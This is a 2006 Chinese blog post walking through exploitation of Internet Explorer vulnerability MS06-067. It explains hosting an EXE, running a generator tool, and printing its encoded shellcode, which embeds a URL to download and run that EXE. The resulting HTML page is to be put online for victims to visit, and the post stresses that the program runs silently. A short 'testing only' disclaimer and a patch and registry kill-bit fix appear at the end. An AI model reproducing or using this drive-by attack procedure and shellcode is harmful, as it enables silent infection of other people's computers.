令人汗颜的IE最新漏洞（MS06-067）利用测试 2006年12月03日 星期日 01:35 这个的出现,预示新的网马即将大大出手了!!!!!!!



令人汗颜的IE最新漏洞（MS06-067）利用测试

作者：IceskYsl@1st
来源：http://www.1steam.cn
申明：测试使用，请勿于非法用途，转载请注明出处！

这个漏洞太恐怖了，恐怖的让我不敢写出来，考虑到马上网上这样的工具都会泛滥，还是提前告诉大家比较好，我不详细的利用过程，如果你接触过类似的，肯定是会使用的，再次奉劝大家，测试为主，不要乱技术软件，危害他人！

受影响的系统：
Microsoft Windows 2000 Service Pack 4
Microsoft Windows XP Service Pack 2
Microsoft Windows XP Professional x64 Edition
Microsoft Windows Server 2003
Microsoft Windows Server 2003 Service Pack 1
Microsoft Windows Server 2003（用于基于 Itanium 的系统）
Microsoft Windows Server 2003 SP1（用于基于 Itanium 的系统）
Microsoft Windows Server 2003 x64 Edition

受影响软件：
Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 6.0
Microsoft Internet Explorer 5.0.1 SP4

不受影响软件：
Internet Explorer 7
－－－－－－－－－－－－－

利用过程如下，刚才写的时候突然断网，重新写一次，郁闷。。

1、首先把一个你需要运行的EXE文件放在网上，得到地址： http://www.1steam.cn/tools/jhzj.exe（我这里测试用的是按钮突破专家）。

2、接着看下这个生成工具（LION提供的，谢）的使用方法： 

QUOTE:

Usage: e:/MS_exp/06067/MS06067.exe <URL> [htmlfile]

<URL>－－就是你的EXE的路径，如我这里的“按钮突破专家”的地址：
[htmlfile]－－需要生成的HTML文件的名称，如我这里的1st.html

3、生成过程，按照上面的格式就可以生成了，过程如下：

QUOTE:
E:\MS_exp\06067>MS06067 http://www.1steam.cn/tools/jhzj.exe 1st.html
[+] download url:http://www.1steam.cn/tools/jhzj.exe
[+] exploit file:1st.html
"%ua3e9%u0000%u5f00%ua164%u0030%u0000%u408b%u8b0c"
"%u1c70%u8bad%u0868%uf78b%u046a%ue859%u0043%u0000"
"%uf9e2%u6f68%u006e%u6800%u7275%u6d6c%uff54%u9516"
"%u2ee8%u0000%u8300%u20ec%udc8b%u206a%uff53%u0456"
"%u04c7%u5c03%u2e61%uc765%u0344%u7804%u0065%u3300"
"%u50c0%u5350%u5057%u56ff%u8b10%u50dc%uff53%u0856"
"%u56ff%u510c%u8b56%u3c75%u748b%u782e%uf503%u8b56"
"%u2076%uf503%uc933%u4149%u03ad%u33c5%u0fdb%u10be"
"%ud63a%u0874%ucbc1%u030d%u40da%uf1eb%u1f3b%ue775"
"%u8b5e%u245e%udd03%u8b66%u4b0c%u5e8b%u031c%u8bdd"
"%u8b04%uc503%u5eab%uc359%u58e8%uffff%u8eff%u0e4e"
"%uc1ec%ue579%u98b8%u8afe%uef0e%ue0ce%u3660%u2f1a"
"%u6870%u7474%u3a70%u2f2f%u7777%u2e77%u7331%u6574"
"%u6d61%u632e%u2f6e%u6f74%u6c6f%u2f73%u686a%u6a7a"
"%u652e%u6578%u0000";
[+] exploit write to 1st.html success!


看到这句：[+] exploit write to 1st.html success!就说明成功了。可以去MS06067.exe的目录下，看到生成的HTML文件1st.html。
4、把这个HTML文件放在网上，给人家访问就可以了，我这里的这个测试网页地址在：
http://www.1steam.cn/modiy/1st.html　，你可以打开看看效果，如果你能看到运行的“按钮突破专家”，说明成功。

5、修补
官方已经除了补丁，地址在：http://www.microsoft.co.ke/china/technet/security/bulletin/MS06-067.MSpx。

或者修补如下（LION提供的，再谢）：
请将以下文本粘贴于记事本等文本编辑器中。然后，使用.reg文件扩展名保存文件：

QUOTE:

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet 
Explorer\ActiveX Compatibility\{D7A7D7C3-D47F-11D0-89D3-00A0C90833E6}]
"Compatibility Flags"=dword:00000400


双击此.reg文件将其应用到各个系统。

PS：这个漏洞，运行EXE不闪，也不弹窗，不声不响的，太恐怖了